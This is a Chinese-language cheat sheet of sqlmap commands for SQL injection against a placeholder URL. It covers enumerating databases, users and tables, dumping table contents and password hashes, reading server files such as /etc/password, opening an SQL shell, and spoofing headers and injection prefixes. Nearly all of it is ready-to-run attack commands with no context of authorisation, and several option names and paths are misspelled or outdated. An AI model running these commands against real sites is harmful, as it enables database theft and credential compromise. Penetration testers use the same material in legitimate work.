Sqlmap数据库常用语句总结
./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库
./sqlmap.py -u “注入地址” -v 1 --current-db // 当前数据库
./sqlmap.py -u “注入地址” -v 1 --users // 列数据库用户
./sqlmap.py -u “注入地址” -v 1 --current-user // 当前用户
./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库” // 列举数据库的表名
./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库” // 获取表的列名
./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
sqlmap会将获取的数据存储sqlmap/output/中。
MySQL数据库举例:
-
判断当前用户是否是dba
python sqlmap.py -u “url” --is-dba -v 1 -
–users:列出数据库管理系统用户
python sqlmap.py -u “url” --users -v 0 -
–passwords:数据库用户密码(hash)
python sqlmap.py -u “url” --passwords -v 0
python sqlmap.py -u “url” --passwords -U sa -v 0 -
查看用户权限
python sqlmap.py -u “url” --privileges -v 0
python sqlmap.py -u “url” --privileges -U postgres -v 0 -
–dbs可以利用的数据库
python sqlmap.py -u “url” --dbs -v 0 -
–tables列数据库表
python sqlmap.py -u “url” --tables -D “information_scheam”-D:指定数据名称
-
–columns 列出表中的列名
python sqlmap.py -u “url” --columns -T “user” -D “mysql” -v 1-T:指定表名,-D:指定库名
-
–dump列表中指定列的内容
python sqlmap.py -u “url” --dump -T “users” -D “testdb”
-C:可以指定字段指定列的范围为2到4
python sqlmap.py -u “url” --dump -T “users” -D “testdb” --start 2 --stop 4 -v 0 -
–dumap-all列出所有数据库,所有表内容
python sqlmap.py -u “url” --dump-all -v 0只列出用户自己新建的数据库和表的内容
python sqlmap.py -u “url” --dump-all --exclude-sysdbs -v 0
-
–file读取文件内容[load_file()函数]
python sqlmap.py -u “url” --file /etc/password -
执行SQL
python sqlmap.py -u “url” --sql-shell -
-p 指定参数
python sqlmap.py -u “url” -v 1 -p “id”-p可以指定多参数-p “cat,id”
-
POST提交
python sqlmap.py -u “url” --method POST --data “id=1” -
COOKIE提交
python sqlmap.py -u “url” --cookie “id=1” -v 1cookie值可以由TamperData抓取
-
refer欺骗
python sqlmap.py -u “url” --refer “url” -v 3
-
使用自定义user-agent或者user-agents.txt
python sqlmap.py -u “url” --user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3python sqlmap.py -u “url” -v 1 -a “./txt/user-agents.txt”
-
使用多线程猜解
python sqlmap.py -u “url” -v 1 --current-user --threads 3 -
指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “url” -v 2 --dbms “PostgreSQL” -
指定操作系统绕过SQLMAP自动检测
python sqlmap.py -u “url” -v 2 --os “Windows” -
–prefix and --postfix自定义payload
python sqlmap.py -u “url” -v 3 -p “id” --prefix “’” --postfix “and ‘test’='test” -
union注入测试
python sqlmap.py -u “url” --union-test -v -1 -
配合order by
python sqlmap.py -u “url” --union-test --union-tech orderby -v 1 -
python sqlmap.py -u “url” -v 1 --union-use --banner
-
python sqlmap.py -u “url” -v 5 --union-use --current-user
-
python sqlmap.py -u “url” -v 1 --union-use --dbs